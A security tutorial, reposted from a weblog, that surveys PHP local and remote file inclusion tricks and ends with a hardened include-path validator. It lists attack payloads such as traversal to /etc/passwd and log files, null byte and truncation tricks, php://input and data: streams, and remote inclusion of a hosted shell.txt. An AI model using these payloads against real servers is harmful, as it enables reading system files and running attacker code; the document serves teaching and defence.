Nytro

Exploiting PHP File Inclusion – Overview

Recently I have seen a lot of questions regarding PHP file inclusions and the possibilities you have, so I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like having them summed up in one place.

Basic Local File Inclusion:

<?php include("includes/" . $_GET['file']); ?>

  • Including files in the same directory:
    ?file=.htaccess
  • Path Traversal:
    ?file=../../../../../../../../../var/lib/locate.db
    (this file is interesting because it is the locate database: it lets you search the filesystem for other files worth including)
  • Including injected PHP code:
    ?file=../../../../../../../../../var/log/apache/error.log
    (other possible Apache log directories and further techniques are linked in the original post. Think about all possible log files, file uploads, session files etc.; temporarily uploaded files might work too.)

Limited Local File Inclusion:

<?php include("includes/" . $_GET['file'] . ".htm"); ?>

  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off; the null byte terminates the path, so the appended ".htm" is ignored. PHP 5.3.4 and later reject paths containing a null byte.)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off; more details are linked in the original post)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
    (the path is padded past PHP's MAXPATHLEN, 4096 bytes on Linux, so the appended ".htm" is cut off; more details are linked in the original post)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd……………. …
    (Windows only, because Windows strips trailing dots from file names; more details are linked in the original post)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (the padding goes in front of the target instead of behind it; more details are linked in the original post)

Basic Remote File Inclusion

<?php include($_GET['file']); ?>

  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using the PHP stream php://input:
    ?file=php://input
    (put your PHP payload in the POST body and watch the URL encoding; requires allow_url_include=On; details are linked in the original post)
  • Using the PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source, because the base64-encoded output is not evaluated as PHP; decode it on your side. More details are linked in the original post)
  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if outbound connections are firewalled or only whitelisted domains are allowed: a reflected XSS on the local host echoes your PHP code into a page that is then included)

Limited Remote File Inclusion

<?php include($_GET['file'] . ".htm"); ?>

  • ?file=http://websec.wordpress.com/shell
    (the server appends ".htm", so host the payload as shell.htm)
  • ?file=http://websec.wordpress.com/shell.txt?
    (the appended ".htm" becomes part of the query string)
  • ?file=http://websec.wordpress.com/shell.txt%23
    (%23 is "#", so the appended ".htm" becomes the URL fragment)
    All three require allow_url_fopen=On and allow_url_include=On.

Static Remote File Inclusion:

<?php include("http://192.168.1.10/config.php"); ?>

  • Man In The Middle
    (lame indeed, but often forgotten)

Of course you can combine all the tricks. If you are aware of any others, or of interesting files to include, please leave a comment and I'll add them.
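Every trick above, from the basic path traversal to the limited and remote variants, works because the include path is built from raw user input. The following is an added example, not code from the original post: a replacement for the vulnerable includes shown above that fails closed against each listed class of payload. The helper name safe_include_path and the includes/ directory are assumptions for illustration.

```php
<?php
// Added example, not from the original post. Hardened replacement for
//   include("includes/" . $_GET['file'] . ".htm");
// safe_include_path() and the includes/ directory are assumed names.

declare(strict_types=1);

/**
 * Resolve $userFile inside $baseDir and return the absolute path to include,
 * or null when the request must be refused. Each check maps to one of the
 * payload classes from the overview.
 */
function safe_include_path(string $baseDir, string $userFile, array $allowedExt = ['htm']): ?string
{
    // 1. Null byte injection (%00): PHP >= 5.3.4 refuses such paths itself,
    //    but fail closed explicitly so older interpreters behave the same.
    if ($userFile === '' || strpos($userFile, "\0") !== false) {
        return null;
    }
    // 2. Stream wrappers and remote URLs (php://, data://, http://, ftp://, ...):
    //    a local template name never carries a scheme.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userFile)) {
        return null;
    }
    // 3. Path, dot and reverse path truncation all need a name far longer than
    //    any real template; MAXPATHLEN is 4096 on Linux, so cap well below it.
    if (strlen($userFile) > 255) {
        return null;
    }
    // 4. Flat file name only: rejects ../ traversal, directory components and
    //    the trailing "/" used for the directory listing variant. Leading dots
    //    (".htaccess", "..") are refused as well.
    if ($userFile !== basename($userFile) || $userFile[0] === '.') {
        return null;
    }
    // 5. Extension allow-list taken from the name itself, not from a suffix we
    //    append (an appended suffix is exactly what the limited tricks strip).
    $ext = strtolower(pathinfo($userFile, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    // 6. Canonicalise and prove the result still lives under $baseDir, so that
    //    symlinks inside includes/ cannot point out of it either.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $userFile);
    if ($base === false || $full === false) {
        return null; // base directory or template does not exist
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the include directory
    }
    return $full;
}

// Usage: the include from the post, with the check in front of it.
$path = safe_include_path(__DIR__ . '/includes', $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid template');
}
include $path;
```

Checks 1 to 3 are redundant with the realpath containment test in check 6, since a wrapper string or a traversal never resolves to a file under includes/, but the explicit tests make the intent visible and avoid depending on how a given PHP version handles null bytes or over-long paths. When the set of includable pages is small, an explicit map from a short key to a fixed file name (for example ['home' => 'home.htm']) with no user-controlled path at all is simpler still. Independently of either, keep allow_url_include=Off (and allow_url_fopen=Off where nothing needs it), which removes the remote, php://input and data:// variants regardless of application bugs.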

Source: Exploiting PHP File Inclusion – Overview « Reiners' Weblog
